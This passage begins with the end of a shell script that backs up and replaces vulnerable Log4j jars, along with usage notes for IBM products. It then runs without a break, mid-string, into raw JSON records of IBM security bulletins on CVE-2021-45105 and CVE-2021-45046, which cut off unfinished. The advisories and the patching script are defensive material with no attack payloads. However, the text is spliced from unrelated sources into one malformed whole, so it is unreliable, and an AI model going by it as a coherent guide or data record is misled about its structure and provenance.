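    [ -n "$old" ] || continue
    if [ "$mode" = keep ]; then target="$old"; else target="$libdir/$(basename "$new")"; fi
    mv "$old" "$backup/" || return 1
    # copy under a temp name, then rename: the lib dir never holds a half-written jar
    cp "$new" "$target.tmp" && mv "$target.tmp" "$target" || return 1
    # the cksum ties the installed file to its source whatever name it sits under
    printf '%s <- %s cksum=%s\n' "$(basename "$target")" "$(basename "$new")" \
      "$(cksum < "$new" | cut -d' ' -f1)" >> "$record"
  done <<EOF
$plan
EOF
  printf '%s\n' "$record"
}

# Constructed demo: plain files stand in for jars (the operation is on file names).
demo_lib=$(mktemp -d); demo_new=$(mktemp -d)
printf 'old core\n' > "$demo_lib/log4j-core-2.8.2.jar"
printf 'old api\n'  > "$demo_lib/log4j-api-2.8.2.jar"
printf 'other\n'    > "$demo_lib/other-1.0.jar"
printf 'core 2.17.0\n' > "$demo_new/log4j-core-2.17.0.jar"
printf 'api 2.17.0\n'  > "$demo_new/log4j-api-2.17.0.jar"
printf 'sources\n'     > "$demo_new/log4j-core-2.17.0-sources.jar"
demo_rec=$(replace_log4j_jars "$demo_lib" "$demo_new") && cat "$demo_rec"
ls "$demo_lib"
[ -n "$demo_rec" ] && rm -rf "$(dirname "$demo_rec")"
rm -rf "$demo_lib" "$demo_new"
```

For the Spectrum Protect Help system the call is `replace_log4j_jars .../TSM_HELP.war/WEB-INF/lib /path/to/apache-log4j-2.17.0-bin`; for the GKLM 4.1.0 workaround it is `replace_log4j_jars .../sklm_kms.ear/lib /path/to/apache-log4j-2.15.0-bin keep`, which leaves the 2.13.3 file names in place exactly as the bulletin's rename step does. Move the backup directory off the host once the server has been validated, then rescan: the old jars should no longer appear anywhere on disk.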
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Event Streams| 2019.4.1, 2019.4.2, 2019.4.3, 2019.4.4, 2019.4.5 \nIBM Event Streams| 10.0.0, 10.1.0, 10.2.0, 10.3.0, 10.3.1, 10.4.0 \n \n## Remediation/Fixes\n\n#### IBM Event Streams (Helm-based releases)\n\n * Download the 2019.4.6 release from [IBM Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/IBM+Event+Streams&release=2019.4.1&platform=All&function=fixId&fixids=*IBM-Event-Streams*> \"IBM Fix Central\" ).\n * Upgrade to IBM Event Streams 2019.4.6 by following the [upgrading and migrating](<https://ibm.github.io/event-streams/2019.4/installing/upgrading/> \"upgrading and migrating\" ) documentation.\n\n**IBM Event Streams (Continuous Delivery)**\n\n * Upgrade to IBM Event Streams 10.5.0 by following the [upgrading and migrating](<https://ibm.github.io/event-streams/installing/upgrading/> \"\" ) documentation.\n\n**IBM Event Streams (Extended Update Support)**\n\n * Upgrade to IBM Event Streams 10.2.1 by following the [upgrading and migrating](<https://ibm.github.io/event-streams/10.2/installing/upgrading/> \"\" ) documentation.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-24T15:57:25", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Event Streams (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-24T15:57:25", "id": "3E89F6F868ACED4017A55BB54A40658D10E6704003F50ACBCE289C1637B41045", "href": "https://www.ibm.com/support/pages/node/6536920", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:32", "description": "## Summary\n\nThere are multiple Apache Log4j (CVE-2021-45105, CVE-2021-45046) vulnerabilities impacting IBM Watson Studio Premium Add On in Cloud Pak for Data which uses Apache Log4j for logging. The fix includes Apache Log4j 2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. 
A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \n \nIBM Watson Studio Premium Add On in Cloud Pak for Data\n\n| 4.0.4 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now **\n\n**Affected Product(s)**\n\n| **Version(s)**| **Fixes** \n---|---|--- \nIBM Watson Studio Premium Add On in Cloud Pak for Data| 4.0.4| \n\nGet the latest refresh by upgrading to [4.0.5](<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=planning-operator-operand-versions#versions__cpd-platform> \"4.0.5\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T02:01:54", "type": "ibm", "title": "Security Bulletin: IBM Watson Studio Premium Add On in Cloud Pak for Data is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-27T02:01:54", 
"id": "5FAA10ECBDD6BDD67568DC782206BEA34BD7120E44FD8D30001A968A438E5C77", "href": "https://www.ibm.com/support/pages/node/6551312", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:37", "description": "## Summary\n\nIBM Sterling Secure Proxy is vulnerable to denial of service and arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-45105,CVE-2021-45046). The fix includes Apache Log4j 2.17.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. 
\nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Secure Proxy| 3.4.3.2 \nIBM Sterling Secure Proxy| 6.0.2 \nIBM Sterling Secure Proxy| 6.0.3 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\nSee the Fix Central links below for Apache Log4j 2.17.0 jar files and installation instructions for an immediate remediation of the vulnerabilities prior to full iFixes for the associated releases. \n\n**Product**| **VRMF**| **Remediation** \n---|---|--- \nIBM Sterling Secure Proxy| 6.0.3| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling Secure Proxy| 6.0.2| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling Secure Proxy| 3.4.3.2| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \n \nThe [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) link points to a fix called SSP-SEAS-log4j-2.17.0-jars-for-CVE-2021-45105 which supplies the jars and instructions to replace them. 
This fix remediates CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T16:02:00", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j impact IBM Sterling Secure Proxy (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-04T16:02:00", "id": "1C6CC8129E7AEC5C314CCFD7570FC09548438820946E9774FD2E2410C0897958", "href": "https://www.ibm.com/support/pages/node/6538100", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:56:48", "description": "## Summary\n\nApache Log4j has vulnerabilities that affect IBM Sterling B2B Integrator. Final remediation images published below. 
As an alternative to the final remediation images, manual mitigation steps are also provided below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.1.1.0 \n \nNote that remote perimeter server, CLA2, OpsServer and external purge have been assessed for impact and were found to be not affected.\n\nDue to concern surrounding Apache Log4j CVE-2021-45046 and CVE-2021-45105, the end-of-support stream IBM Sterling B2B Integrator Version 5.2.x has been assessed for impact; the versions and fix packs below were found to be not affected by CVE-2021-45046 and CVE-2021-45105: \n5020605_3 and all lower fix packs \n5020604 and all fix packs \n5020603 and all fix packs \n5020602 and all fix packs \n5020601 and all fix packs \n5020600 and all fix packs \n5020500 and all fix packs \n5020402 and all fix packs\n\n## Remediation/Fixes\n\nProduct & Version| Remediation & Fix \n---|--- \nIBM Sterling B2B Integrator 6.0.0.0 - 6.1.1.0| \n\n**_IIM_**\n\nStep 1: Apply IBM Sterling B2B Integrator IIM version 6.0.0.7, 6.0.3.5, 6.1.0.4, 6.1.1.0, 6.0.2.3 or 6.0.1.2 \n\nStep 2: Apply the remediating ifix 6.0.0.7_1, 6.0.3.5_1, 6.1.0.4_1, 6.1.1.0_1, 6.0.2.3._1 or 6.0.1.2_1 that are located on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>).\n\nFor 6.1.1.0, after applying the remediating ifix 6.1.1.0_1, additionally follow the steps in this [technote.](<https://www.ibm.com/support/pages/node/6551444> \"technote\" )\n\n**_Docker & Containers_**\n\nStep 1: Apply either IBM Sterling B2B Integrator Docker version 6.0.0.7, 6.0.3.5 or 6.1.0.4. \n\nStep 2: Apply one of the remediating ifixes below:\n\nIBM Sterling B2B Integrator Docker version 6.0.0.7_1 on [Fix 
Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>)\n\nIBM Sterling B2B Integrator Docker version 6.0.3.5_1 on [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+B2B+Integrator&fixids=6.0.3.5-OtherSoftware-B2Bi-Docker-All-IF0001&source=SAR>)\n\nIBM Sterling B2B Integrator Container version 6.1.0.4_1\n\n * [Certified Container Image](<cp.icr.io/cp/ibm-b2bi/b2bi:6.1.0.4_1> \"Certified Container Image\" )\n * [Helm Chart](<https://github.com/IBM/charts/blob/master/repo/ibm-helm/ibm-b2bi-prod-2.0.5.tgz> \"Helm Chart\" ) \n \n## Workarounds and Mitigations\n\n**If you are unable to apply the remediated fix packs above, as an alternative IBM strongly recommends addressing the vulnerability by applying one of these mandatory remediation steps below now. **\n\n**Before applying any of the Workarounds and Mitigations below ensure that the file system of IBM Sterling B2B Integrator has been fully backed up.**\n\n**Linux: ** The following script can be applied to **Linux** B2Bi ASI node and Adapter Container nodes. Please ensure to read the included readme file before applying.\n\n[`http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+B2B+Integrator&fixids=B2Bi-rhel-log4j-remediation&source=SAR`](<https://urldefense.com/v3/__http:/www.ibm.com/support/fixcentral/quickorder?product=ibm*2FOther*software*2FSterling*B2B*Integrator&fixids=B2Bi-rhel-log4j-remediation&source=SAR__;JSslKys!!I6-MEfEZPA!eWYwlqriN-0XFGfQDbcUIDbKwx1QTpU_oCC9q9d8EMVMPkNXi37hTGqsbPYUGfFTnVdp0Q$>) \n\n\n**AIX**: The following script can be applied to **AIX** B2Bi ASI node and Adapter Container nodes. 
Please ensure to read the included readme file before applying.\n\n[`http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+B2B+Integrator&fixids=B2Bi-aix-log4j-remediation&source=SAR`](<https://urldefense.com/v3/__http:/www.ibm.com/support/fixcentral/quickorder?product=ibm*2FOther*software*2FSterling*B2B*Integrator&fixids=B2Bi-aix-log4j-remediation&source=SAR__;JSslKys!!I6-MEfEZPA!bcZjVMMicPAaQ9c71mSnBWEX8b1NEyFcdfntlAaHB1rftTMSVAtbUysoDT_d0sn0Mimx1Q$>)\n\n**Docker Container or OCP**: The following document with steps can be manually applied to **Docker Container or OCP** B2Bi ASI node and Adapter Container nodes: \n\n[`http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+B2B+Integrator&fixids=B2Bi-Docker-and-OCP-log4j-remediation&source=SAR`](<https://urldefense.com/v3/__http:/www.ibm.com/support/fixcentral/quickorder?product=ibm*2FOther*software*2FSterling*B2B*Integrator&fixids=B2Bi-Docker-and-OCP-log4j-remediation&source=SAR__;JSslKys!!I6-MEfEZPA!c94_YkFcF1M9ywRiF_61mK9mSfXF5FFY-lRHlEo2qVqdmb-ywEmpfj5hPhLkFuccMx7w8Q$>) \n \n\n\n**Windows: **The following document with steps can be manually applied to **Windows** B2Bi ASI node and Adapter Container nodes: \n\n[`http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+B2B+Integrator&fixids=B2Bi-windows-log4j-remediation&source=SAR`](<https://urldefense.com/v3/__http:/www.ibm.com/support/fixcentral/quickorder?product=ibm*2FOther*software*2FSterling*B2B*Integrator&fixids=B2Bi-windows-log4j-remediation&source=SAR__;JSslKys!!I6-MEfEZPA!Yanxte2R4h-EsVIYkKcQJv0i5mi2QTHWu86BAyOoPPPgXgLCzga6SGT4eCvBtG-AoQ2XNQ$>)\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T17:29:35", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Sterling B2B Integrator (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-18T17:29:35", "id": "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "href": "https://www.ibm.com/support/pages/node/6537664", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:55", "description": "## Summary\n\nApache Log4j is used by IBM Security Access Manager for Enterprise Single Sign-On as part of its logging infrastructure. IBM Security Access Manager for Enterprise Single Sign-On is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046). The fix includes Apache Log4j v.2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. 
Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Security Access Manager for Enterprise Single-Sign On| 8.2.2 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading \n\nApply Fix Pack 12 on IBM Security Access Manager for Enterprise Single-Sign On version 8.2.2 as per the details available [here](<https://www.ibm.com/support/pages/node/6539792> \"here\" ). 
\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T07:49:05", "type": "ibm", "title": "Security Bulletin: IBM Security Access Manager for Enterprise Single Sign-On is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-15T07:49:05", "id": "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "href": "https://www.ibm.com/support/pages/node/6541182", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:41", "description": "## Summary\n\nMultiple vulnerabilities in Apache Log4j could allow an attacker to execute arbitrary code and denial of service on the system. These vulnerabilities may affect IBM Spectrum Scale For IBM Elastic Storage Server because the library is used by the Graphical User Interface (GUI) of IBM Spectrum Scale. 
\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)** | **Version(s)** \n---|--- \nIBM Spectrum Scale for IBM Elastic Storage Server | \nV5.3.6.0 - V5.3.7.3 \nIBM Spectrum Scale for IBM Elastic Storage Server | V6.0.1.0 - V6.1.2.1 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability by installing the Spectrum Scale for IBM ESS version specific efix:** **Product(s)** | **Remediation(s)** \n---|--- \nIBM Spectrum Scale for IBM Elastic Storage Server V5.3.6.0 - V5.3.7.3 \n\n| For the fix contact [IBM Support](<https://www.ibm.com/mysupport> \"IBM Support\" ) or [call](<https://www.ibm.com/docs/en/spectrum-scale/5.0.4?topic=center-how-contact-support> \"call\" ), reference** APAR IJ36851** \nIBM Spectrum Scale for IBM Elastic Storage Server V6.0.1.0 - V6.1.2.1 | \n\nFor the fix contact [IBM Support](<https://www.ibm.com/mysupport> \"IBM Support\" ) and or [call](<https://www.ibm.com/docs/en/spectrum-scale/5.0.4?topic=center-how-contact-support> \"call\" ), reference** APAR IJ36818** \n \n**Note**: Selected efixes are on Fix Central, see <https://www.ibm.com/support/pages/node/6537748>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, 